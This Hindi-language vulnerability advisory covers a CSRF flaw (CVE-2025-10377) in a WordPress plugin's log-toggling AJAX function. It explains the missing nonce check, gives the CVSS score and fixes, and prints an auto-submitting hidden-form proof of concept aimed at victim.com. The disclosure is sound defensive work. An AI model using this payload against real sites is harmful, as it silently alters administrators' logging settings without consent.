
CVE-2025-10377
भेद्यता प्रकार: क्रॉस-साइट अनुरोध जालसाजी (CSRF)
प्रभावित फ़ंक्शन: sd_toggle_logs()
CVSS v3.1: 4.3 (मध्यम)
वेक्टर: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(नोट: स्कोर अनधिकृत स्थिति परिवर्तन को दर्शाता है जिसके लिए एक व्यवस्थापक पीड़ित और उपयोगकर्ता इंटरैक्शन की आवश्यकता होती है।)
भेद्यता का विवरण:
sd_toggle_logs() फ़ंक्शन संवेदनशील कार्यों को संसाधित करता है जैसे पेज एक्सेस लॉग, एरर लॉग और ईमेल डिलीवरी लॉग को सक्षम/अक्षम करना। हालांकि, यह केवल $_REQUEST['log_type'] पैरामीटर और एक क्षमता जांच (current_user_can( 'manage_options' )) पर निर्भर करता है, बिना CSRF सुरक्षा (जैसे check_admin_referer() या नॉन्स) लागू किए।
परिणामस्वरूप, एक हमलावर लॉग-इन व्यवस्थापक को किसी दुर्भावनापूर्ण पृष्ठ पर जाने के लिए लुभा सकता है जो चुपचाप एक निर्मित अनुरोध सबमिट करता है, जिससे साइट लॉगिंग में अनपेक्षित सक्षम/अक्षम परिवर्तन होते हैं।
साइट लॉगिंग सुविधाओं के लिए अनधिकृत स्थिति परिवर्तन (पेज एक्सेस लॉग, एरर लॉग, ईमेल डिलीवरी लॉग)।
यदि एरर लॉगिंग सक्षम है, तो साइट एप्लिकेशन त्रुटियों को प्लगइन द्वारा निर्धारित फ़ाइल पथ पर लिखना शुरू कर सकती है (लॉग के माध्यम से परिचालन संबंधी जानकारी के प्रकट होने की संभावना बढ़ जाती है), लेकिन इस समस्या का सीधा प्रभाव स्वयं स्थिति टॉगल है।
जब manage_options वाला एक लॉग-इन उपयोगकर्ता हमलावर के पृष्ठ पर जाता है, तो संबंधित लॉगिंग सुविधा स्पष्ट सहमति के बिना टॉगल हो जाती है।
<body>
<form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="sd_toggle_logs" />
<input type="hidden" name="log_type" value="errors_log" />
<input type="hidden" name="fast_ajax" value="true" />
<input type="hidden" name="load_plugins[]" value="system-dashboard/system-dashboard.php" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
अनुरोधों को मान्य करने के लिए WordPress नॉन्स (check_admin_referer() या wp_verify_nonce()) लागू करें।
संवेदनशील कार्यों को केवल POST अनुरोधों तक सीमित रखें।
CSRF से सुरक्षा के लिए केवल क्षमता जांच पर निर्भर रहने से बचें।
यदि आप रिपोर्ट में वर्णित समस्या को ठीक वैसे ही दोहरा नहीं पा रहे हैं, तो कृपया स्पष्ट प्रजनन परिदृश्य के लिए निम्नलिखित वीडियो प्रदर्शन (PoC) देखें: